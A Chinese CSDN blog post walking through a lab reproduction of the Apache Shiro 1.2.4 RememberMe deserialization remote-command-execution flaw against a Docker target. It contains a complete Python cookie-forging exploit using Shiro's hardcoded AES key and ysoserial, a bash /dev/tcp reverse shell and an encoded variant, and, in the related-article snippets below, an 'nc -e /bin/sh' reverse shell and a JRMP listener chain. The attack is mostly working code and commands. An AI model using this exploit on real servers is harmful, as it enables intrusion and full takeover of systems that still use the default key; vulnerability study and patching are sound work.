【漏洞复现】最简洁的Shiro RememberMe 1.2.4 反序列化命令执行漏洞

最新推荐文章于 2024-04-23 09:40:15 发布
最新推荐文章于 2024-04-23 09:40:15 发布
阅读量4.3k 收藏 6
点赞数
分类专栏: 漏洞复现 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T_Snail_T/article/details/105300227
版权

0x00 前言

最近在内网进行测试,朋友跟我说在内网这种漏洞比较多,记得这个漏洞是很久之前就爆出来了,当时只是看了一下复现文档,没有进行实操,正好这次复现了,在这里记录一下,而且我这里使用的办法比网上大部分文章都相对简洁,很适合跟我一样的小白复现。

0x01 服务器环境安装

直接使用docker进行环境的安装

 docker pull medicean/vulapps:s_shiro_1

安装好之后为了能够进行访问与反弹Shell,这里需要对端口进行映射(端口映射需要在启动的时候设置映射的端口,不然就需要重新启动)

启动容器

docker run -d -p 80:8080 -p 7777:6666 medicean/vulapps:s_shiro_1

查看一下,状态为UP代表正在运行中
在这里插入图片描述
直接访问
在这里插入图片描述
好的,服务器环境安装完毕了

0x02 漏洞验证

怎么确定网站是Shiro环境的呢?
使用BurpSuite抓取数据包,通过响应包中的 rememberMe=deleteMe来确认
在这里插入图片描述

0x03 攻击机环境安装

攻击机的系统为:debian 9

先更新一下

sudo apt-get update

方便下载exp,先安装git

sudo apt install git

安装JDK

sudo apt-get install openjdk-8-jdk

因为生成Cookie的脚本需要安装依赖,这里直接安装pip来进行依赖的安装,首先安装pip

sudo apt install python3-pip

安装依赖pycrypto

sudo pip3 install pycrypto

安装MVN

sudo apt update
sudo apt upgrade
sudo apt install maven

安装完成验证一下

mvn --version

最后安装一下nc

sudo apt install netcat-openbsd

好的,万事俱备了,下面开始进行攻击

0x04 开始攻击

下载EXP

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests

这里需要用Python脚本进行代码执行的生成
代码如下

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

需要将脚本跟ysoserial-0.0.6-SNAPSHOT-all.jar放到同一个目录
在这里插入图片描述
反弹Shell的代码需要进行base64加密,先进行加密

反弹Shell命令(地址请替换成自己的公网地址)

bash -i >& /dev/tcp/1.1.1.1/6666 0>&1

加密网站:http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
下面是生成反弹Shell到我本机的命令

python3 test.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNS4x1OTxI2uMTg4LjIxMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

运行后会在/tmp目录生成payload.cookie文件
在这里插入图片描述
开始监听6666端口
在这里插入图片描述
再次来到WEB页面,随便抓取一个页面的数据包
在这里插入图片描述
将payload.cookie文件中的内容替换到Cookie中,再次发送数据包
在这里插入图片描述
成功获得反弹的Shell
在这里插入图片描述

至此,漏洞复现完毕,感谢观看。
T_Snail_T
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
shiro反序列化
cc777777777的博客
06-10 496
shiro发序列化
Shiro框架漏洞详解及复现
m0_64481831的博客
03-07 1240
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
漏洞复现Shiro 反序列化漏洞
zkaqlaoniao的博客
11-09 1233
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
Shiro rememberMe反序列化漏洞(Shiro-550)复现
m0_67401660的博客
04-07 1184
欢迎到我的博客查看原文:http://www.xpshuai.cn/posts/40239/ 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过.
shiro反序列化漏洞原理分析以及漏洞复现
hackzkaq的博客
11-04 210
shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥是硬编码在shiro源码中,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。特征:cookie中含有rememberMe字段修复建议:更新shiro1.2.4以上的版本。不使用默认的加密密钥,改为随机生成密钥。
shiro反序列化漏洞
qq_41696518的博客
06-27 1322
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7477
shiro -550 反序列化(一)
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
mohanhan
06-23 2238
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell题外话1题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生原因: shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。使用大佬脚本生成 payl
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6243
shiro反序列化漏洞
Shiro RememberMe 反序列化漏洞
hbxf_xs的博客
11-27 1958
Apache Shiro 反序列化漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作(未作
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro版本<=1.2.4时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化...
shiro-1.2.4-rce:shiro <= 1.2.4反序列化命令脚本
05-22
= 1.2.4 反序列化远程命令执行利用脚本 使用延时判断key和gadget,即使目标不出网也可以检测是否存在漏洞 python脚本需要调用ysoserial-sleep.jar,ysoserial-sleep.jar文件并不是原版的,增加了延时命令功能,故...
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 742
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 34
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 771
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
跨境电商测评攻略:如何安全有效地提升业绩?
最新发布
zcwz888的博客
04-23 188
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行渗透。\[1\] 在服务端接收cookie值时,攻击者可以利用这个漏洞进行攻击。攻击者可以按照以下步骤来解析处理cookie值:首先检索RememberMe cookie的值,然后进行Base64解码,接着使用AES解密(加密密钥硬编码),最后进行反序列化操作。由于在调用反序列化时未进行任何过滤处理,攻击者可以触发远程代码执行漏洞。\[2\] 攻击者可以利用这个漏洞执行反弹shell语句,从而获取对目标系统的控制权。例如,可以使用以下命令执行反弹shell语句:python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"。\[3\] #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值